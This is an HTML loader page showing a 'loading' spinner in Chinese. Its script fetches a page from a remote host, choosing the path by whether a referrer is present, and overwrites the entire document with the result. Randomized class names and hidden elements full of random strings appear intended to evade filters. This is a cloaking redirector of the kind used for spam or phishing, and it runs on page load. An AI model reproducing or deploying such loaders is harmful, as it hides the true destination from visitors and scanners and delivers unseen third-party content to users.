<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .K7RsdN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .K7RsdN .j5rwoYs0Il1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .K7RsdN .content {
            line-height: 50px;
            text-align: center
        }

        .K7RsdN .img {
            width: 100%
        }

        .K7RsdN .vXPae1GjB {
            text-align: center
        }

        .K7RsdN .vXPae1GjB span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .K7RsdN .vXPae1GjB span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .K7RsdN .vXPae1GjB span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .K7RsdN .vXPae1GjB span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .K7RsdN .vXPae1GjB span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .K7RsdN .vXPae1GjB span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .K7RsdN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EeKIhIIzwxZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JNTsbhf = EeKIhIIzwxZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JNTsbhf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JNTsbhf +".html?a=share";
		}
		
        RAsab0=url+"#"+new Date().getTime();
        RAsab0 && function() {
            $.get(RAsab0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>ULXAB7cj0YkG4toWne5JfBqno3iLFaRcU1XWDekikXULwhe3ZqZXlVdfJcv8CuQZ2AMDowpyAKzc1RcgXnfIeiibbOSLlf1i</div>
<a  href='#' style='display:none'>oY7Y9ZcyWdkJKDma080GAyO4OpolgpAgA7mq2BFt2eobigQ2EOFvgskem5T24hD435df</a>
<h1 style='display:none' >ZN2Th7B7lLUtGj57A3poAtUiwmtAtuMWR9SX</h1><div class="K7RsdN">
    <div class="j5rwoYs0Il1">
        <div class="vXPae1GjB">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Urpom0XdIJIFSk8TYF1txyBJsDPHkW1cVFu4x6rSz2tY4K6nUK4hvzsqR55wv1iyk0c6BkFEoyZi6bUN0iSDW</p>
<img  src='' style='display:none'>
<ul style='display:none' >gJGO6p3Wj5a4iT4dZhYhtA24JdtSg</ul>
<b style='display:none' >wrCFQrh3raWj4NljrFK8v0o9iDihvUA1oyRwIgSaa6QInPb89KR9s2lr4VLnEl6tn4g8rKluNkRbOk88Z4NSUrkEfVtYnMrwQ</b>
<p  style='display:none'>Urpom0XdIJIFSk8TYF1txyBJsDPHkW1cVFu4x6rSz2tY4K6nUK4hvzsqR55wv1iyk0c6BkFEoyZi6bUN0iSDW</p>
<li style='display:none' >sd7Kpg7801ERL13vPbT</li>
<img  src='' style='display:none'>
<p  style='display:none'>Urpom0XdIJIFSk8TYF1txyBJsDPHkW1cVFu4x6rSz2tY4K6nUK4hvzsqR55wv1iyk0c6BkFEoyZi6bUN0iSDW</p>
<p  style='display:none'>Urpom0XdIJIFSk8TYF1txyBJsDPHkW1cVFu4x6rSz2tY4K6nUK4hvzsqR55wv1iyk0c6BkFEoyZi6bUN0iSDW</p>
<h1 style='display:none' >ukg3xL25pTQ4ohva0envxKqFoTLMEfByjoqBzLiUxZxafwJluG4WxqxmFdewN37zvvVK</h1></body>
</html>